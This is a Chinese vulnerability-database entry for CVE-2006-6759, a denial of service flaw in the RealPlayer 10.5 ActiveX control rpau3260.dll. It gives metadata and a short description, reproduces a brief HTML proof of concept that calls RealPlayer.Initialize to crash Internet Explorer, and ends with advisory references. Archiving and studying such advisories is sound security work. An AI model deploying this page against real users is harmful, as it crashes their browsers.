RealNetworks RealPlayer ActiveX控件RealPlayer.Initialize方法远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111810 漏洞类型 其他
发布时间 2006-12-20 更新时间 2007-01-05
CVE编号 CVE-2006-6759 CNNVD-ID CNNVD-200612-552
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2966
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-552
|漏洞详情
RealNetworksRealPlayer10.5中的rpau3260.dll中某个ActiveX控件存在拒绝服务漏洞。远程攻击者可以通过带特定自变量调用RealPlayer.Initialize方法来发起拒绝服务攻击(InternetExplorer崩溃)。
|漏洞EXP
<!--
---------------------------------------------------------------------------
RealPlayer 10.5 rpau3260.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

<html>
<body>
<object classid="clsid:405DE7C0-E7DD-11D2-92C5-00C0F01F77C1" id="RealPlayer">
</object>
<script>
RealPlayer.Initialize("AA","defaultV")
</script>
</html>
</body>

<!--
Just initialize the control, the close IE :)
-->

# milw0rm.com [2006-12-20]
|参考资料

来源:XF
名称:realplayer-rpau3260dll-dos(31138)
链接:http://xforce.iss.net/xforce/xfdb/31138
来源:MISC
链接:http://www.securityfocus.com/data/vulnerabilities/exploits/21689.html
来源:BID
名称:21689
链接:http://www.securityfocus.com/bid/21689
来源:MILW0RM
名称:2966
链接:http://www.milw0rm.com/exploits/2966
来源:MILW0RM
名称:2966
链接:http://milw0rm.com/exploits/2966